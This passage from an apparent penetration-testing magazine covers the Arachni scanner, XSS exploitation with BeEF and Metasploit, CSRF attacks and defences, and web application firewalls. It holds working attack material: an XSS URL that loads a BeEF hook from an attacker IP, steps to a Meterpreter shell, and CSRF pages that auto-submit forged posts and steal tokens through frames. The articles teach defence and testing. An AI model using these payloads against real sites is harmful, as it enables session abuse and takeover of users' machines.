Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except the modules related to Cross-Site Scripting (XSS).
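To make these include/exclude semantics concrete, here is a tiny illustrative sketch in Python (not Arachni's actual implementation; the function names and the simplified glob handling are assumptions made for illustration only):

```python
import re

def _rx(glob):
    # translate the simple glob-style pattern used on the command line
    # into a regular expression
    return re.compile(glob.replace("*", ".*"))

def select_modules(available, patterns):
    # Mimics the --mods semantics described above: patterns select modules,
    # and a leading '-' turns a pattern into an exclusion.
    selected = set()
    for pat in patterns:
        if pat.startswith("-"):
            selected = {m for m in selected if not _rx(pat[1:]).search(m)}
        else:
            selected |= {m for m in available if _rx(pat).search(m)}
    return sorted(selected)

mods = ["xss_tag", "xss_uri", "sqli_blind", "csrf"]
print(select_modules(mods, ["*", "-xss_*"]))  # every module except the XSS ones
```

Arachni itself matches module names with Ruby regular expressions; the sketch only mirrors the observable include/exclude behaviour.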
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2. Start a scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common directories on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist utilized
                by this module will be vast and will add a considerable
                amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces or confidential
                    information are exposed.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree; you'll find the modules directory. In there, you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needs to be protected and you forget about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in the further scans), as well as creating a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, are now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this out.
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF, Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1 User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a Zombie has connected. You can see this in the Log section on the right-hand side, or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane, then click on Standard Modules - Alert Dialog. This will result in a little popup box appearing on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So as you can see, thanks to BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code:

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text input, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1)
BeEF - Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.

Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).

Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now though is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).

Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The "jobs" command
Figure 10. Metasploit after clicking "Send Now"
Figure 11. Meterpreter window - screenshot 1
Figure 12. Meterpreter window - screenshot 2
Now first ensure that the Zombie is still connected. Then click on Standard Modules - Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools (Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit) and install them on it. We can then use these to port scan an entire internal network, or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input, and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
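The encoding step can be sketched in a few lines (Python's html.escape stands in here for PHP's htmlspecialchars(); the function name render_search_result is a hypothetical stand-in for the reflection done by search1.php):

```python
import html

def render_search_result(user_input):
    # encode the user-controlled value before reflecting it back, so that
    # <script> arrives at the browser as inert text instead of executable markup
    return "The parameter passed is " + html.escape(user_input, quote=True)

payload = "<script>alert(document.domain)</script>"
print(render_search_result(payload))  # markup characters come out as HTML entities
```

The same one-line change in the PHP code (htmlspecialchars($a, ENT_QUOTES) instead of a raw echo) would have stopped the proof-of-concept above.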
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System, Network and Web Application Penetration Testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email - arvinddoraiswamy@gmail.com
LinkedIn - http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings - http://resources.infosecinstitute.com/author/arvind AND http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.

CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:

• Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
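Why lenient referrer checking fails can be sketched in a few lines (a hypothetical validator in Python, not any real framework's API; site.com is the trusted host from the listings):

```python
from urllib.parse import urlparse

def referrer_ok(referer_header, trusted_host="site.com"):
    # Privacy tools and some proxies strip the Referer header entirely,
    # so a deployed check is forced to accept requests without one...
    if referer_header is None:
        return True  # ...and that is the loophole: a forged request can simply omit it
    return urlparse(referer_header).hostname == trusted_host

assert referrer_ok("http://site.com/form") is True
assert referrer_ok("http://evil.com/csrf.html") is False
assert referrer_ok(None) is True  # the attacker's path around the check
```

The check only blocks the lazy attacker who leaves the Referer header intact; it provides no guarantee on its own.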
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from a CAPTCHA image every time he submits a form might make users stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a

Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011

Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame" method="POST">
<input type="text" name="message" value="I like www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):

index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;

Browser settings are not hard to modify, so the best way to secure a web application is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed.

<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, to compare them after the form is submitted.
Mechanisms used to subvert one-time tokens usually rely on brute-force attacks. Brute forcing one-time tokens is worthwhile only if the mechanism is widely used by web developers. For example, the following PHP code:

<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
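For contrast, here is a sketch of a token mechanism built on a cryptographically secure source, which resists the guessing attacks described above (shown in Python for brevity; the helper names are hypothetical):

```python
import hmac
import secrets

def new_csrf_token():
    # 32 random bytes from the OS CSPRNG, hex-encoded: infeasible to guess
    return secrets.token_hex(32)

def token_matches(expected, submitted):
    # compare in constant time, so the check itself leaks no timing hints
    return hmac.compare_digest(expected, submitted)

session_token = new_csrf_token()  # stored server-side in the session
form_token = session_token        # embedded in the form's hidden field
assert token_matches(session_token, form_token)
assert not token_matches(session_token, "not-the-token")
```

The same ideas are available in modern PHP through random_bytes()/bin2hex() for generation and hash_equals() for the comparison.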
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code, for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery - http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) - http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide. They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and our working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.

A major reason for these rapid developments is the almost unlimited possibility to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications, one which they often do not fulfill.

Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away information freely. The attackers then only have to evaluate this information, and they have an extensive basis for later, targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then also have to raise the security of older web applications to the required standard later on.

However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. Take a program that has until now not processed its inputs and outputs via centralized interfaces and is to be enhanced so that the data can be checked: it is not sufficient to just add new functions. The developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that use nothing more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
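The session fixation risk just mentioned can be illustrated with a short sketch (all names are hypothetical and not taken from any product): a minimal session store that issues a fresh session ID at login, so that an ID planted by an attacker before login becomes worthless.

```python
import secrets

# Minimal in-memory session store (illustrative only).
sessions = {}  # session_id -> {"user": username or None}

def new_session():
    sid = secrets.token_hex(16)
    sessions[sid] = {"user": None}
    return sid

def login(old_sid, user):
    """Regenerate the session ID at login to prevent session fixation:
    an attacker who planted old_sid cannot use it after the victim logs in."""
    data = sessions.pop(old_sid)      # invalidate the pre-login ID
    data["user"] = user
    new_sid = secrets.token_hex(16)   # issue a fresh, unpredictable ID
    sessions[new_sid] = data
    return new_sid

# An attacker-known ID becomes useless once the victim logs in:
planted = new_session()
fresh = login(planted, "alice")
assert planted not in sessions
assert sessions[fresh]["user"] == "alice"
```

An application that keeps the pre-login ID would skip the `pop`/reissue step, which is exactly the weakness the article describes.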
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.

The situation is not much better with web applications that are developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of an Application-Level Firewall (ALF) or Application-Level Gateway (ALG). In contrast with classic firewalls and Intrusion Detection Systems (IDS), a WAF checks the communication at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably reduces the risk of attacks on any weak spots.

After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis, as this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
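Why filtering inverted commas alone does not stop SQL Injection can be shown with a tiny sketch (the filter below is a deliberately naive stand-in, not a real WAF rule): a payload aimed at a numeric context contains no quotes at all and passes the filter unchanged.

```python
def strip_quotes(value: str) -> str:
    """Naive WAF rule: drop single and double quotation marks."""
    return value.replace("'", "").replace('"', "")

# A classic quoted payload is mangled by the filter...
assert strip_quotes("' OR '1'='1") == " OR 1=1"
# ...but a numeric-context payload needs no quotes and slips through:
payload = "1 OR 1=1"
assert strip_quotes(payload) == payload
```

This is the kind of residual gap a penetration test after WAF deployment is meant to uncover.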
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load balancing in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.

